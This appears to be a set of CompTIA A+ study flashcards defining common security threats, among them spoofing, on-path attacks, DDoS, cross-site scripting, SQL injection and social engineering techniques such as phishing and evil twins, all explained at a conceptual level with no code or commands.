Threats

Question 1

Zero-Day Attack

Answer 1

A zero-day attack is an attack on a vulnerability that wasn’t already known to the software developers. It gets the name because the developer of the flawed software has had zero days to fix the vulnerability. Microsoft, Apple, and other software developers regularly post patches to fix flaws as they’re discovered.

Question 2

Spoofing

Answer 2

Spoofing is the process of pretending to be someone or something you are not by placing false information into your packets. Any data sent on a network can be spoofed. Here are a few quick examples of commonly spoofed data:

• Source MAC address and IP address, to make you think a packet came from somewhere else
• E-mail address, to make you think an e-mail came from somewhere else
• Web address, to make you think you are on a Web page you are not on
• Username, to make you think a certain user is contacting you when in reality it’s someone completely different

Generally, spoofing isn’t so much a threat as it is a tool to make threats. If you spoof my e-mail address, for example, that by itself isn’t a threat. If you use my e-mail address to pretend to be me, however, and to ask my employees to send in their usernames and passwords for network login? That’s clearly a threat. (And also a waste of time; my employees would never trust me with their usernames and passwords.)

Question 3

On-path attack (Man-In-The-Middle)

Answer 3

In an on-path attack (previously referred to as the man-in-the-middle attack), an attacker taps into communications between two systems, covertly intercepting traffic thought to be only between those systems, reading or in some cases even changing the data and then sending the data on. A classic on-path attack would be a person using special software on a wireless network to make all the clients think his laptop is a wireless access point. He could then listen in on that wireless network, gathering up all the conversations and gaining access to passwords, shared keys, or other sensitive information.

Question 4

Session Hijacking

Answer 4

Somewhat similarly to on-path attacks, session hijacking tries to intercept a valid computer session to get authentication information. Unlike on-path attacks, session hijacking only tries to grab authentication information, not necessarily listening in like an on-path attack.

Question 5

Brute-Force Attack

Answer 5

CompTIA describes brute force as a threat, but it’s more of a method that threat agents use. Brute force is a method where a threat agent guesses many or all possible values for some data. Most of the time the term brute force refers to an attempt to crack a password, but the concept also applies to other attacks. You can brute force a search for open ports, network IDs, usernames, and so on. Pretty much any attempt to guess the contents of some kind of data field that isn’t obvious (or is hidden) is considered a brute-force attack.

Question 6

Denial of Service

Answer 6

A denial of service (DoS) attack uses various methods to overwhelm a system, such as a Web server, to make it essentially nonfunctional. DoS attacks were relatively common in the early days of the Web. These days you’ll see distributed denial of service (DDoS) attacks that use many machines simultaneously to assault a system. A DDoS attack is generally executed using a botnet. A botnet consists of any number (usually a large one) of systems infected with malware designed to allow them to be controlled by an attacker and used to send disruptive traffic designed to bring down a resource. You’ll get a closer look at botnets and how they work later on in the chapter when we discuss malware.

Question 7

Cross-Site Scripting

Answer 7

Most companies have Web sites, and Web sites can sometimes be very vulnerable to attacks by the bad guys. One such attack that can pose a threat to your Web applications is known as cross-site scripting. Cross-site scripting (XSS) is an attack in which the attacker injects malicious code into the Web app in order to trick it into sending things it shouldn’t to other users of the Web site. Generally, this occurs due to errors in the application’s code, which the attacker finds and exploits. XSS can lead to account takeovers, stolen data, or even a full takeover of the Web site or app. The nitty-gritty details of XSS, specific variants of the attack, and how to prevent them are things you’ll learn more about in CompTIA Security+, but for the CompTIA A+ 1102 exam, be aware that cross-site scripting can pose a major threat to an organization’s Web site(s).

Question 8

SQL Injection

Answer 8

You’ve most likely deduced by now that accessing, stealing, and destroying data are common goals of malicious actors, so let’s take a look at one of the favorite methods hackers use to achieve them. Before I can tell you about the dreaded SQL injection, I’m going to have to tell you what SQL is. SQL is an acronym for Structured Query Language. SQL is a language that enables a program to interact with a database using various commands and queries. If you’ve started thinking that attacking a database sounds like a dangerous threat, you’re right. An SQL injection occurs when an attacker enters SQL commands into an input field like you’d see in a Web app, in order to gain access to data in a database that they shouldn’t be able to see. You won’t need to know the ins and outs of how SQL injection is performed, but know that preventing it is done at the programming level, with something known as input validation.

Question 9

Unauthorized Access

Answer 9

Unauthorized access occurs when a person accesses resources without permission. “Resources” in this case means data, applications, and hardware. A user can alter or delete data; access sensitive information, such as financial data, personnel files, or e-mail messages; or use a computer for purposes the owner did not intend.

Not all unauthorized access is malicious—often this problem arises when users who are poking around in a computer out of curiosity or boredom discover they can access resources in a fashion the primary user did not have in mind. Unauthorized access becomes malicious when people knowingly and intentionally take advantage of weaknesses in your security to gain information, use resources, or destroy data!

One way to gain unauthorized access is intrusion. You might imagine someone kicking in a door and hacking into a computer, but more often than not it’s someone sitting at a home computer, trying various passwords over the Internet. Not quite as glamorous, but it’ll do. Another insidious method is manipulating people into giving privileged information or access that would be otherwise unavailable to a would-be attacker. This takes us into a discussion of one of the most common and dangerous categories of threats.

Question 10

Social Engineering

Answer 10

Although you’re more likely to lose data through accidents, the acts of malicious users get the headlines. Most of these attacks come under the heading of social engineering—the process of using or manipulating people inside the organization to gain access to its network or facilities—which covers the many ways humans can use other humans to gain unauthorized information. This information may be a network login, a credit card number, company customer data—almost anything you might imagine that one person or organization may not want outsiders to access.

Common social engineering techniques include:

• Infiltration: Infiltration involves attackers physically entering a facility, often through impersonation, to gain access to sensitive information or systems.
• Information Gathering: Information gathering refers to threat actors collecting information to facilitate future attacks, often using techniques like dumpster diving or shoulder surfing.
• Vishing: Vishing is a social engineering attack where attackers use phone calls to trick individuals into revealing sensitive information, like usernames or passwords.
• Phishing: Phishing is a method where attackers send fraudulent communications, usually emails, to deceive victims into providing sensitive information such as usernames, passwords, or financial details.
• Spear phishing: Spear phishing targets specific individuals with tailored messages, using personalized information to increase the likelihood of success.
• Whaling: Whaling is a type of phishing attack that specifically targets high-ranking individuals within an organization, such as executives, for valuable information.
• Evil Twin: An evil twin is a fake wireless access point set up to mimic a legitimate one, used by attackers to intercept network traffic and steal sensitive data from connected users.